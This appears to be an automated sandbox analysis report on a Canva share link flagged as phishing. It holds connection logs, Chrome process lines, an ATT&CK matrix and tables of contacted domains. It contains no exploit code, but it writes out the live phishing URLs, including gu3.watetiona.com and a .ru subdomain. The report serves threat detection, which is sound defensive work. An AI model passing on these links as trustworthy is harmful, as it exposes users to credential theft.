    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
    Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
    Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
    Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
    Source: unknownNetwork traffic detected: HTTP traffic on port 50220 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
    Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50216
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50210
    Source: unknownNetwork traffic detected: HTTP traffic on port 50248 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50211
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50227
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50228
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50221
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50220
    Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50222
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50232
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
    Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50248
    Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
    Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
    Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50228 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50208
    Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50202
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49754 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49805 version: TLS 1.2
    Source: classification engineClassification label: mal52.phis.win@26/213@198/590
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1904,i,9976407154716733636,9960061309519468343,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1904,i,9976407154716733636,9960061309519468343,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    s.tribalfusion.com
    104.18.37.193
    truefalse
      high
      static.cloudflareinsights.com
      104.16.79.73
      truefalse
        high
        global.px.quantserve.com
        91.228.74.244
        truefalse
          high
          s-part-0035.t-0009.t-msedge.net
          13.107.246.63
          truefalse
            high
            www.canva.com
            104.16.103.112
            truefalse
              high
              eu-eb2.3lift.com
              13.248.245.213
              truefalse
                high
                bttrack.com
                192.132.33.68
                truefalse
                  high
                  adobetarget.data.adobedc.net
                  66.235.152.156
                  truefalse
                    high
                    idsync.rlcdn.com
                    35.244.154.8
                    truefalse
                      high
                      5igcqa810yp2rcmgvohmmeoewkmyvjbw4uvf8uaagn99durqrlobvm.birsbunh.ru
                      104.21.32.1
                      truefalse
                        unknown
                        code.jquery.com
                        151.101.2.137
                        truefalse
                          high
                          dualstack.tls13.taboola.map.fastly.net
                          151.101.1.44
                          truefalse
                            high
                            static.canva.com
                            104.16.102.112
                            truefalse
                              high
                              sync.crwdcntrl.net
                              18.141.252.181
                              truefalse
                                high
                                cdnjs.cloudflare.com
                                104.17.24.14
                                truefalse
                                  high
                                  publisher.liveperson.net
                                  34.120.154.120
                                  truefalse
                                    high
                                    cm.g.doubleclick.net
                                    142.250.181.2
                                    truefalse
                                      high
                                      sni1gl.wpc.omegacdn.net
                                      152.199.21.175
                                      truefalse
                                        high
                                        rtb.adentifi.com
                                        23.20.243.197
                                        truefalse
                                          high
                                          www.google.com
                                          142.250.181.132
                                          truefalse
                                            high
                                            dcs-ups.g03.yahoodns.net
                                            188.125.88.204
                                            truefalse
                                              high
                                              dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com
                                              54.155.160.118
                                              truefalse
                                                high
                                                sync.srv.stackadapt.com
                                                54.165.187.207
                                                truefalse
                                                  high
                                                  msftenterprise.sc.omtrdc.net
                                                  63.140.62.27
                                                  truefalse
                                                    high
                                                    match.adsrvr.org
                                                    52.223.40.198
                                                    truefalse
                                                      high
                                                      star-mini.c10r.facebook.com
                                                      157.240.195.35
                                                      truefalse
                                                        high
                                                        a.nel.cloudflare.com
                                                        35.190.80.1
                                                        truefalse
                                                          high
                                                          us-u.openx.net
                                                          35.244.159.8
                                                          truefalse
                                                            high
                                                            o13855.ingest.sentry.io
                                                            34.120.195.249
                                                            truefalse
                                                              high
                                                              s.twitter.com
                                                              104.244.42.195
                                                              truefalse
                                                                high
                                                                gu3.watetiona.com
                                                                104.21.59.210
                                                                truetrue
                                                                  unknown
                                                                  aragorn-prod-or-acai-lb.inbake.com
                                                                  35.83.238.191
                                                                  truefalse
                                                                    unknown
                                                                    dsum-sec.casalemedia.com
                                                                    104.18.26.193
                                                                    truefalse
                                                                      high
                                                                      a.tribalfusion.com
                                                                      104.18.37.193
                                                                      truefalse
                                                                        high
                                                                        challenges.cloudflare.com
                                                                        104.18.94.41
                                                                        truefalse
                                                                          high
                                                                          dh1y47vf5ttia.cloudfront.net
                                                                          18.66.161.117
                                                                          truefalse
                                                                            unknown
                                                                            ib.anycast.adnxs.com
                                                                            185.89.210.46
                                                                            truefalse
                                                                              high
                                                                              pug-sg4c.pubmnet.com
                                                                              67.199.150.86
                                                                              truefalse
                                                                                high
                                                                                js.monitor.azure.com
                                                                                unknown
                                                                                unknownfalse
                                                                                  high
                                                                                  ag.innovid.com
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    high
                                                                                    idpix.media6degrees.com
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      high
                                                                                      va.v.liveperson.net
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        high
                                                                                        px.owneriq.net
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          high
                                                                                          static-assets.fs.liveperson.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            high
                                                                                            cm.everesttech.net
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              high
                                                                                              jadserve.postrelease.com
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                high
                                                                                                z.clarity.ms
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  high
                                                                                                  dmpsync.3lift.com
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    high
                                                                                                    accdn.lpsnmedia.net
                                                                                                    unknown
                                                                                                    unknownfalse
                                                                                                      high
                                                                                                      assets.adobedtm.com
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        high
                                                                                                        rtd.tubemogul.com
                                                                                                        unknown
                                                                                                        unknownfalse
                                                                                                          high
                                                                                                          aadcdn.msftauth.net
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            high
                                                                                                            pixel.rubiconproject.com
                                                                                                            unknown
                                                                                                            unknownfalse
                                                                                                              high
                                                                                                              trc.taboola.com
                                                                                                              unknown
                                                                                                              unknownfalse
                                                                                                                high
                                                                                                                munchkin.marketo.net
                                                                                                                unknown
                                                                                                                unknownfalse
                                                                                                                  high
                                                                                                                  cms.analytics.yahoo.com
                                                                                                                  unknown
                                                                                                                  unknownfalse
                                                                                                                    high
                                                                                                                    sync-tm.everesttech.net
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      high
                                                                                                                      lpcdn.lpsnmedia.net
                                                                                                                      unknown
                                                                                                                      unknownfalse
                                                                                                                        high
                                                                                                                        ds.reson8.com
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          high
                                                                                                                          ups.analytics.yahoo.com
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            high
                                                                                                                            image2.pubmatic.com
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              high
                                                                                                                              cdn.botframework.com
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                high
                                                                                                                                dpm.demdex.net
                                                                                                                                unknown
                                                                                                                                unknownfalse
                                                                                                                                  high
                                                                                                                                  rtd-tm.everesttech.net
                                                                                                                                  unknown
                                                                                                                                  unknownfalse
                                                                                                                                    high
                                                                                                                                    servedby.flashtalking.com
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      high
                                                                                                                                      www.facebook.com
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        high
                                                                                                                                        www.clarity.ms
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          high
                                                                                                                                          mscom.demdex.net
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            high
                                                                                                                                            play.vidyard.com
                                                                                                                                            unknown
                                                                                                                                            unknownfalse
                                                                                                                                              high
                                                                                                                                              analytics.twitter.com
                                                                                                                                              unknown
                                                                                                                                              unknownfalse
                                                                                                                                                high
                                                                                                                                                cms.quantserve.com
                                                                                                                                                unknown
                                                                                                                                                unknownfalse
                                                                                                                                                  high
                                                                                                                                                  ib.adnxs.com
                                                                                                                                                  unknown
                                                                                                                                                  unknownfalse
                                                                                                                                                    high
                                                                                                                                                    sync.search.spotxchange.com
                                                                                                                                                    unknown
                                                                                                                                                    unknownfalse
                                                                                                                                                      high
                                                                                                                                                      login.microsoftonline.com
                                                                                                                                                      unknown
                                                                                                                                                      unknownfalse
                                                                                                                                                        high
                                                                                                                                                        lptag.liveperson.net
                                                                                                                                                        unknown
                                                                                                                                                        unknownfalse
                                                                                                                                                          high
                                                                                                                                                          NameMaliciousAntivirus DetectionReputation
                                                                                                                                                          https://gu3.watetiona.com/YEcft/true
                                                                                                                                                            unknown
                                                                                                                                                            https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=documentfalse
                                                                                                                                                              unknown
                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              18.141.252.181
                                                                                                                                                              sync.crwdcntrl.netUnited States
                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                              91.228.74.244
                                                                                                                                                              global.px.quantserve.comUnited Kingdom
                                                                                                                                                              27281QUANTCASTUSfalse
                                                                                                                                                              20.189.173.6
                                                                                                                                                              unknownUnited States
                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                              35.83.238.191
                                                                                                                                                              aragorn-prod-or-acai-lb.inbake.comUnited States
                                                                                                                                                              237MERIT-AS-14USfalse
                                                                                                                                                              104.18.37.193
                                                                                                                                                              s.tribalfusion.comUnited States
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              35.244.154.8
                                                                                                                                                              idsync.rlcdn.comUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              142.250.181.132
                                                                                                                                                              www.google.comUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              52.167.30.171
                                                                                                                                                              unknownUnited States
                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                              151.101.130.137
                                                                                                                                                              unknownUnited States
                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                              104.16.102.112
                                                                                                                                                              static.canva.comUnited States
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              104.121.8.149
                                                                                                                                                              unknownUnited States
                                                                                                                                                              16625AKAMAI-ASUSfalse
                                                                                                                                                              64.233.164.84
                                                                                                                                                              unknownUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              34.120.154.120
                                                                                                                                                              publisher.liveperson.netUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              23.218.208.236
                                                                                                                                                              unknownUnited States
                                                                                                                                                              6453AS6453USfalse
                                                                                                                                                              35.190.80.1
                                                                                                                                                              a.nel.cloudflare.comUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              151.101.66.49
                                                                                                                                                              unknownUnited States
                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                              151.101.193.44
                                                                                                                                                              unknownUnited States
                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                              18.66.161.113
                                                                                                                                                              unknownUnited States
                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                              23.20.243.197
                                                                                                                                                              rtb.adentifi.comUnited States
                                                                                                                                                              14618AMAZON-AESUSfalse
